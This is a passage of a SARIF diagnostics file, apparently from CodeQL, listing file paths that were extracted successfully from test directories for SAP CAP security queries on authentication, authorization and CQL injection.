with-cds-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":106}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json","uriBaseId":"%SRCROOT%","index":107}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js","uriBaseId":"%SRCROOT%","index":108}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":109}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":110}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":111}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":112}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds","uriBaseId":"%SRCROOT%","index":113}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":114}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":115}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.js","uriBaseId":"%SRCROOT%","index":116}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json","uriBaseId":"%SRCROOT%","index":117}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js","uriBaseId":"%SRCROOT%","index":118}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":119}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":120}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":121}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":122}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds","uriBaseId":"%SRCROOT%","index":123}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/model.cds.json","uriBaseId":"%SRCROOT%","index":124}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/server.js","uriBaseId":"%SRCROOT%","index":125}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/package.json","uriBaseId":"%SRCROOT%","index":126}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds","uriBaseId":"%SRCROOT%","index":127}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.js","uriBaseId":"%SRCROOT%","index":128}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.cds","uriBaseId":"%SRCROOT%","index":129}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.js","uriBaseId":"%SRCROOT%","index":130}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":131}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":132}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json","uriBaseId":"%SRCROOT%","index":133}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js","uriBaseId":"%SRCROOT%","index":134}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":135}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":136}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":137}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":138}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds","uriBaseId":"%SRCROOT%","index":139}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/model.cds.json","uriBaseId":"%SRCROOT%","index":140}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json","uriBaseId":"%SRCROOT%","index":141}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js","uriBaseId":"%SRCROOT%","index":142}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds","uriBaseId":"%SRCROOT%","index":143}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js","uriBaseId":"%SRCROOT%","index":144}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds","uriBaseId":"%SRCROOT%","index":145}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js","uriBaseId":"%SRCROOT%","index":146}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds","uriBaseId":"%SRCROOT%","index":147}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/model.cds.json","uriBaseId":"%SRCROOT%","index":148}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/package-lock.json","uriBaseId":"%SRCROOT%","index":149}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/package.json","uriBaseId":"%SRCROOT%","index":150}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/server.js","uriBaseId":"%SRCROOT%","index":151}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/privileged-user.js","uriBaseId":"%SRCROOT%","index":152}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":153}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":154}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":157}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":158}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json","uriBaseId":"%SRCROOT%","index":159}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js","uriBaseId":"%SRCROOT%","index":160}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":161}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":162}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":163}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":164}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":165}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":166}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json","uriBaseId":"%SRCROOT%","index":167}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js","uriBaseId":"%SRCROOT%","index":168}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":169}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":170}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":171}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":172}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":173}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/model.cds.json","uriBaseId":"%SRCROOT%","index":174}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json","uriBaseId":"%SRCROOT%","index":175}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js","uriBaseId":"%SRCROOT%","index":176}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":177}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":178}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":179}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds","uriBaseId":"%SRCROOT%","index":180}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/package.json","uriBaseId":"%SRCROOT%","index":181}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/model.cds.json","uriBaseId":"%SRCROOT%","index":182}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":183}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds","uriBaseId":"%SRCROOT%","index":184}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}